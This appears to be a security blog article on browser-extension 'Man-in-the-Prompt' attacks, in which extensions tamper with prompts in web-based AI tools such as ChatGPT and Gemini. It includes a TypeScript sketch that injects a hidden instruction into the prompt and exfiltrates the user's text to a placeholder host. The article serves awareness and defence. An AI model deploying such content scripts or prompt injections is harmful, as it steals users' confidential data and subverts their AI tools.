Hidden Vulnerabilities in Browser-Based Generative AI Usage

Users and organizations increasingly rely on generative AI (artificial intelligence) tools to streamline workflows, enhance productivity, and handle sensitive data. But new security threats are emerging, some with potentially serious consequences. Recent research highlights a growing vulnerability at the intersection of AI usage and browser extensions, which can be exploited to manipulate prompts and exfiltrate valuable information.

Man-in-the-Prompt Attacks

LayerX researchers have identified a novel exploit that targets AI tools integrated into web browsers, potentially affecting both public and internal systems. The core issue lies in how many AI interfaces are embedded directly into web pages, making them accessible to browser extensions.

Browser extensions can access a web page’s underlying structure, known as the Document Object Model (DOM). When users interact with AI tools like ChatGPT, Google Gemini, or internal copilots, the prompt input fields are part of this DOM. This could allow malicious or compromised extensions to secretly read, alter, or inject prompts (see the sketch after this list), enabling:

  • Prompt injection: Inserting hidden instructions or commands.
  • Data exfiltration: Stealing sensitive data from prompts, responses, or session history.
  • Model manipulation: Tricking AI systems into revealing confidential information or performing unintended actions.
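To make this concrete, the sketch below shows a minimal, hypothetical content script in TypeScript. The CSS selector, injected text, and collection URL are illustrative placeholders rather than the actual DOM of ChatGPT or any other tool; the point is simply that ordinary DOM APIs are enough to capture and rewrite a prompt.

```typescript
// Hypothetical content script illustrating DOM-level prompt tampering.
// PROMPT_SELECTOR and COLLECT_URL are placeholders, not real targets.
const PROMPT_SELECTOR = "textarea";                     // assumed prompt input
const COLLECT_URL = "https://collector.example/ingest"; // placeholder endpoint

function tamperWithPrompt(): void {
  const promptBox = document.querySelector<HTMLTextAreaElement>(PROMPT_SELECTOR);
  if (!promptBox) return;

  // 1. Read whatever the user has typed so far.
  const userPrompt = promptBox.value;

  // 2. Silently append a hidden instruction to the outgoing prompt.
  promptBox.value = `${userPrompt}\n\n(Also follow these extra instructions: ...)`;

  // 3. Exfiltrate the captured text; sendBeacon survives page unloads.
  navigator.sendBeacon(COLLECT_URL, userPrompt);
}

// A real attack would hook the submit flow; a timer keeps the sketch simple.
window.addEventListener("load", () => setTimeout(tamperWithPrompt, 2000));
```

Notably, a script like this needs only a content_scripts entry in the extension manifest; it requests nothing from the extension permissions system.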

Because many extensions operate with broad privileges and require no special permissions, they can be used maliciously without raising suspicion.
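That point is worth spelling out. Below is a hypothetical Manifest V3 declaration, written here as a TypeScript object literal for readability; the match pattern and file names are assumptions. DOM access through a content script requires no entry in the extension's permissions array at all.

```typescript
// Hypothetical Manifest V3 contents, expressed as a TypeScript literal.
// The match pattern and script name are placeholders.
const manifest = {
  manifest_version: 3,
  name: "Harmless-Looking Helper",
  version: "1.0.0",
  content_scripts: [
    {
      matches: ["https://chat.example.com/*"], // pages the script runs on
      js: ["content.js"],                      // the script sketched above
    },
  ],
  // No "permissions" array: content scripts get full DOM access on their
  // matched pages without requesting any extension API permissions.
} as const;
```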

The widespread use of AI tools, combined with the many browser extensions users typically have installed, greatly expands the attack surface. ChatGPT alone sees over 5 billion visits each month, and millions of enterprise users rely on internal and external LLMs (large language models). Most users, including enterprise employees, have extensions installed; many are legitimate, but some may be malicious, vulnerable, or compromised.

AI tools routinely process sensitive data, including proprietary company information, legal documents, customer PII, and strategic plans, so exposure could mean loss of intellectual property, regulatory violations, or reputational damage.

The researchers also demonstrated how a simple, permission-less extension could inject queries into ChatGPT, exfiltrate responses, and erase the traces, potentially allowing attackers to steal conversations or sensitive data. The same technique was shown to extract confidential corporate data from Google Workspace integrations with Gemini AI, which has access to emails, files, and shared documents.

Internally hosted LLMs aren’t entirely safe either. Many companies train internal models on confidential data such as source code, legal files, or HR records. These models are often accessed via browser-based interfaces, making them vulnerable to extension-based attacks. An attacker could silently query internal systems, extract trade secrets, or gather intelligence without detection.

Traditional security measures are insufficient because they can’t monitor DOM-level interactions or detect prompt manipulations. To mitigate these risks, organizations should:

  • Implement in-browser behavior monitoring: Track DOM interactions and detect suspicious activity or unusual extension behavior (a monitoring sketch follows this list).
  • Restrict or block risky extensions: Use behavioral analysis and reputation scores to identify and prevent malicious extensions, even those requiring no permissions.
  • Enforce security policies on web interfaces: Limit or monitor how AI prompts are accessed and manipulated.
  • Educate users: Raise awareness about the risks of installing unvetted browser extensions and promote best practices.
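As a sketch of the first mitigation, the TypeScript below watches an assumed prompt field for value changes that were not produced by trusted user input events, which is one crude signal of script-driven tampering. The selector and reporting hook are hypothetical placeholders; real AI front ends often use contenteditable elements rather than a plain textarea, and a production monitor would need to handle that.

```typescript
// Minimal DOM-monitoring sketch: flag prompt edits not caused by user typing.
// PROMPT_SELECTOR and reportSuspiciousActivity are illustrative placeholders.
const PROMPT_SELECTOR = "textarea";
let lastUserValue = "";

function reportSuspiciousActivity(detail: string): void {
  // Placeholder: a real tool would forward this to a security backend.
  console.warn("[prompt-monitor]", detail);
}

function watchPrompt(promptBox: HTMLTextAreaElement): void {
  // Record the value after every genuine (trusted) user input event.
  promptBox.addEventListener("input", (event) => {
    if (event.isTrusted) {
      lastUserValue = promptBox.value;
    }
  });

  // Periodically check for changes that happened with no trusted event,
  // which is how a rogue script or extension would alter the prompt.
  setInterval(() => {
    if (promptBox.value !== lastUserValue) {
      reportSuspiciousActivity("prompt changed without user input");
      lastUserValue = promptBox.value; // reset to avoid repeated alerts
    }
  }, 500);
}

const promptField = document.querySelector<HTMLTextAreaElement>(PROMPT_SELECTOR);
if (promptField) watchPrompt(promptField);
```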

As AI tools become more integrated into daily workflows, understanding their vulnerabilities is crucial. Browser extension exploits represent a significant blind spot that can lead to data breaches and operational risks. Staying vigilant, updating security strategies, and adopting proactive monitoring can help protect sensitive information from unseen threats lurking in the browser.

For the full details of the research, see LayerX’s analysis post.

